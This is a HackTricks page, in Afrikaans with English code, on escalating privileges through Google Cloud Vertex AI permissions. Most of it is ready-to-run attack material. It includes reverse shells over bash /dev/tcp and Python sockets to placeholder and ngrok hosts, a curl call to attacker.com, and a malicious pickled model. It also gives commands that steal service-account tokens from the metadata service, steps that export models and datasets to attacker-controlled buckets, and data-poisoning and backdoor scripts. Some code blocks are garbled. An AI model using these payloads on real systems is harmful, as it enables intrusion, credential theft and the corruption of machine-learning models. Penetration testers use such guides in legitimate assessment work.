GCP - Vertex AI Privesc

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Vertex AI

Vir meer inligting oor Vertex AI, sien:

GCP - Vertex AI Enum

Vir Agent Engine / Reasoning Engine post-exploitation paths wat die runtime metadata service, die standaard Vertex AI service agent, en cross-project pivoting in consumer / producer / tenant resources gebruik, sien:

GCP - Vertex AI Post Exploitation

aiplatform.customJobs.create, iam.serviceAccounts.actAs

Met die aiplatform.customJobs.create permission en iam.serviceAccounts.actAs op ’n target service account, kan ’n attacker execute arbitrary code with elevated privileges.

Dit werk deur ’n custom training job te skep wat attacker-controlled code uitvoer (hetsy ’n custom container of Python package). Deur ’n privileged service account te spesifiseer via die --service-account flag, erf die job daardie service account se permissions. Die job hardloop op Google-managed infrastructure met toegang tot die GCP metadata service, wat die ekstraksie van die service account se OAuth access token moontlik maak.

Impact: Volledige privilege escalation na die target service account se permissions.

Create custom job with reverse shell ```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region= \ --display-name=revshell-job \ --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \ --command=sh \ --args=-c,"curl http://attacker.com" \ --service-account=@.iam.gserviceaccount.com

On your attacker machine, start a listener first:

nc -lvnp 4444

Once connected, you can extract the token with:

curl -H ‘Metadata-Flavor: Google’ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Method 2: Python reverse shell (if bash reverse shell is blocked)

gcloud ai custom-jobs create
–region=
–display-name=revshell-job
–worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
–command=sh
–args=-c,“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
–service-account=@.iam.gserviceaccount.com

</details>

<details>

<summary>Alternatief: Haal token uit logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>

aiplatform.models.upload, aiplatform.models.get

Hierdie tegniek bereik privilege escalation deur ’n model na Vertex AI op te laai en daardie model te benut om kode met verhoogde voorregte uit te voer via ’n endpoint deployment of batch prediction job.

Note

Om hierdie aanval uit te voer, is dit nodig om ’n world readable GCS bucket te hĂȘ of ’n nuwe een te skep om die model artifacts op te laai.

Upload malicious pickled model with reverse shell ```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickle

class MaliciousModel: def reduce(self): import subprocess cmd = “bash -i >& /dev/tcp/YOUR-IP/4444 0>&1” return (subprocess.Popen, ([‘/bin/bash’, ‘-c’, cmd],))

Save malicious model

with open(‘model.pkl’, ‘wb’) as f: pickle.dump(MaliciousModel(), f) EOF

python3 create_malicious_model.py

Upload to GCS

gsutil cp model.pkl gs://your-bucket/malicious-model/

Upload model (reverse shell executes when endpoint loads it during deployment)

gcloud ai models upload
–region=
–artifact-uri=gs://your-bucket/malicious-model/
–display-name=malicious-sklearn
–container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

On attacker: nc -lvnp 4444 (shell connects when deployment starts)

</details>

<details>

<summary>Laai model op met container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] Na die oplaai van die kwaadwillige model kan ’n aanvaller wag dat iemand die model gebruik, of die model self begin via ’n endpoint deployment of ’n batch prediction job.

iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )

As jy toestemming het om modelle na endpoints te skep en te ontplooi, of endpoint IAM-beleid te wysig, kan jy opgelaaide kwaadwillige modelle in die projek aanwend om privilege escalation te bereik. Om een van die vroeĂ«r opgelaaide kwaadwillige modelle via ’n endpoint te aktiveer, hoef jy net:

Deploy malicious model to endpoint ```bash # Create an endpoint gcloud ai endpoints create \ --region= \ --display-name=revshell-endpoint

Deploy with privileged service account

gcloud ai endpoints deploy-model
–region=
–model=
–display-name=revshell-deployment
–service-account=@.iam.gserviceaccount.com
–machine-type=n1-standard-2
–min-replica-count=1

</details>


#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

As jy toestemming het om **batch prediction jobs** te skep en dit met 'n service account uit te voer, kan jy toegang tot die metadata service kry. Die kwaadwillige kode word uitgevoer vanaf 'n **custom prediction container** of **malicious model** tydens die batch prediction-proses.

**Nota**: Batch prediction jobs kan slegs geskep word via die REST API of Python SDK (geen gcloud CLI ondersteuning).

> [!NOTE]
> Hierdie aanval vereis dat jy eers 'n malicious model oplaai (sien die `aiplatform.models.upload` afdeling hierbo) of 'n custom prediction container gebruik met jou reverse shell code.

<details>

<summary>Skep batch prediction job met malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.models.export

As jy die models.export toestemming het, kan jy modelartefakte na ’n GCS-bucket wat jy beheer uitvoer, en moontlik toegang kry tot sensitiewe opleidingsdata of modellĂȘers.

Note

Om hierdie aanval uit te voer, moet jy ’n wĂȘreldwyd leesbare en skryfbare GCS-bucket hĂȘ, of ’n nuwe een skep om die modelartefakte op te laai.

Voer modelartefakte na 'n GCS-bucket uit ```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export”
-d ‘{ “outputConfig”: { “exportFormatId”: “custom-trained”, “artifactDestination”: { “outputUriPrefix”: “gs://your-controlled-bucket/exported-models/” } } }’

Wait for the export operation to complete, then download

gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Skep **ML pipeline jobs** wat meerdere stappe uitvoer met arbitrĂȘre containers en privilege escalation bereik deur reverse shell toegang.

Pipelines is besonders kragtig vir privilege escalation omdat hulle multi-stage attacks ondersteun waar elke komponent verskillende containers en konfigurasies kan gebruik.

> [!NOTE]
> You need a world writable GCS bucket to use as the pipeline root.

<details>

<summary>Installeer Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Skep pipeline job met reverse shell container ```python #!/usr/bin/env python3 import json import subprocess

PROJECT_ID = “” REGION = “us-central1” TARGET_SA = “”

Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)

pipeline_spec = { “schemaVersion”: “2.1.0”, “sdkVersion”: “kfp-2.0.0”, “pipelineInfo”: { “name”: “data-processing-pipeline” }, “root”: { “dag”: { “tasks”: { “process-task”: { “taskInfo”: { “name”: “process-task” }, “componentRef”: { “name”: “comp-process” } } } } }, “components”: { “comp-process”: { “executorLabel”: “exec-process” } }, “deploymentSpec”: { “executors”: { “exec-process”: { “container”: { “image”: “python:3.11-slim”, “command”: [“python3”], “args”: [“-c”, “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘4.tcp.eu.ngrok.io’,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([‘/bin/bash’,‘-i’])”] } } } } }

Create the request body

request_body = { “displayName”: “ml-training-pipeline”, “runtimeConfig”: { “gcsOutputDirectory”: “gs://gstorage-name/folder” }, “pipelineSpec”: pipeline_spec, “serviceAccount”: TARGET_SA }

Get access token

token_result = subprocess.run( [“gcloud”, “auth”, “print-access-token”], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()

Submit via REST API

import requests

url = f“https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs“ headers = { “Authorization”: f“Bearer {access_token}“, “Content-Type”: “application/json” }

print(f“Submitting pipeline job to {url}“) response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]: result = response.json() print(f“✓ Pipeline job submitted successfully!“) print(f” Job name: {result.get(‘name’, ‘N/A’)}“) print(f” Check your reverse shell listener for connection“) else: print(f“✗ Error: {response.status_code}“) print(f” {response.text}“)

</details>


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Skep **hyperparameter tuning jobs** wat arbitrĂȘre kode met verhoogde regte uitvoer deur custom training containers.

Hyperparameter tuning jobs laat jou toe om verskeie training trials gelyktydig uit te voer, elk met verskillende hyperparameter values. Deur 'n kwaadwillige container met 'n reverse shell of exfiltration command te spesifiseer en dit te koppel aan 'n privileged service account, kan jy privilege escalation bereik.

**Impak**: Volledige privilege escalation na die teiken se service account se permissions.

<details>

<summary>Skep hyperparameter tuning job met reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Eksporteer datasets om training data te exfiltreer wat sensitiewe inligting kan bevat.

Nota: Dataset-operasies vereis REST API of Python SDK (geen gcloud CLI-ondersteuning vir datasets nie).

Datasets bevat dikwels die oorspronklike training data, wat PII, vertroulike sake-data, of ander sensitiewe inligting kan bevat wat gebruik is om produksie-modellen op te lei.

Eksporteer dataset om training data te exfiltreer ```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"

curl -s -X GET
-H “Authorization: Bearer $(gcloud auth print-access-token)”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets”

Step 2: Export a dataset to your own bucket using REST API

DATASET_ID=“”

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export”
-d ‘{ “exportConfig”: { “gcsDestination”: {“outputUriPrefix”: “gs://your-controlled-bucket/exported-data/”} } }’

The export operation runs asynchronously and will return an operation ID

Wait a few seconds for the export to complete

Step 3: Download the exported data

gsutil ls -r gs://your-controlled-bucket/exported-data/

Download all exported files

gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

Step 4: View the exported data

The data will be in JSONL format with references to training data locations

cat exported-data//data-.jsonl

The exported data may contain:

- References to training images/files in GCS buckets

- Dataset annotations and labels

- PII (Personally Identifiable Information)

- Sensitive business data

- Internal documents or communications

- Credentials or API keys in text data

</details>


### `aiplatform.datasets.import`

Importeer kwaadwillige of poisoned data in bestaande datasets om **modelopleiding te manipuleer en backdoors te introduceer**.

**Nota**: Dataset-operasies vereis REST API of Python SDK (geen gcloud CLI-ondersteuning vir datasets nie).

Deur vervaardigde data in 'n dataset te importeer wat gebruik word vir die opleiding van ML-modelle, kan 'n aanvaller:
- Introduce backdoors in modelle (trigger-based misclassification)
- Poison opleidingsdata om modelprestasie te verswak
- Inject data om modelle te laat leak inligting
- Manipuleer modelgedrag vir spesifieke insette

Hierdie aanval is besonder doeltreffend wanneer datasets geteiken word wat gebruik word vir:
- Beeldklassifikasie (inject mislabeled images)
- Teksklassifikasie (inject biased or malicious text)
- Objek-detektering (manipulate bounding boxes)
- Aanbevelingstelsels (inject fake preferences)

<details>

<summary>Importeer poisoned data in dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

Aanvalscenario’s:

Backdoor attack - Image classification ```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```
Etiket-omkeringsaanval ```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```
Data poisoning for model extraction ```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```
Gerigte aanval op spesifieke entiteite ```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```

[!DANGER] Data-poisoning-aanvalle kan ernstige gevolge hĂȘ:

  • Security systems: Omseil gesigsherkenning of anomalie-opsporing
  • Fraud detection: Oefen modelle om sekere bedrogpatrone te ignoreer
  • Content moderation: Veroorsaak dat skadelike inhoud as veilig geklassifiseer word
  • Medical AI: Verkeerd klassifiseer kritieke gesondheidstoestande
  • Autonomous systems: Manipuleer objekopsporing vir veiligheidskritieke besluite

Impak:

  • Backdoored models that misclassify on specific triggers
  • Verminderde modelprestasies en akkuraatheid
  • Vooroordeel in modelle wat teen sekere insette diskrimineer
  • Inligting leak deur modelgedrag
  • Langtermynpersistensie (modelle opgelei op vergiftigde data sal die backdoor erf)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

[!WARNING]

Note

Deprecated API: Die aiplatform.notebookExecutionJobs.create API is verouderd as deel van die deprekasie van Vertex AI Workbench Managed Notebooks. Die moderne benadering is om Vertex AI Workbench Executor te gebruik, wat notebooks laat loop deur aiplatform.customJobs.create (reeds hierbo gedokumenteer). Die Vertex AI Workbench Executor maak dit moontlik om notebook-uitvoerings te skeduleer wat op Vertex AI custom training infrastructure uitgevoer word met ’n gespesifiseerde service account. Dit is in wese ’n gerieflike wrapper rondom customJobs.create. For privilege escalation via notebooks: Gebruik die aiplatform.customJobs.create metode wat hierbo gedokumenteer is — dit is vinniger, meer betroubaar, en gebruik dieselfde onderliggende infrastruktuur as die Workbench Executor.

Die volgende tegniek word slegs vir historiese konteks verskaf en word nie aanbeveel vir gebruik in nuwe assesserings nie.

Skep notebook execution jobs wat Jupyter-notebooks met arbitrĂȘre kode uitvoer.

Notebook jobs is ideaal vir interaktiewe-styl kode-uitvoering met ’n service account, aangesien hulle Python code cells en shell commands ondersteun.

Create malicious notebook file
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
"cells": [
{
"cell_type": "code",
"source": [
"import subprocess\n",
"token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
"print(token.decode())"
]
}
],
"metadata": {},
"nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
Voer notebook uit met die geteikende diensrekening ```bash # Create notebook execution job using REST API PROJECT="gcp-labs-3uis1xlx" REGION="us-central1" TARGET_SA="491162948837-compute@developer.gserviceaccount.com"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs
-d ‘{ “displayName”: “data-analysis-job”, “gcsNotebookSource”: { “uri”: “gs://deleteme20u9843rhfioue/malicious.ipynb” }, “gcsOutputUri”: “gs://deleteme20u9843rhfioue/output/”, “serviceAccount”: “’${TARGET_SA}‘”, “executionTimeout”: “3600s” }’

Monitor job for token in output

Notebooks execute with the specified service account’s permissions

</details>


## Verwysings

- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)

> [!TIP]
> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) of die [**telegram group**](https://t.me/peass) of **volg** ons op **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking tricks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>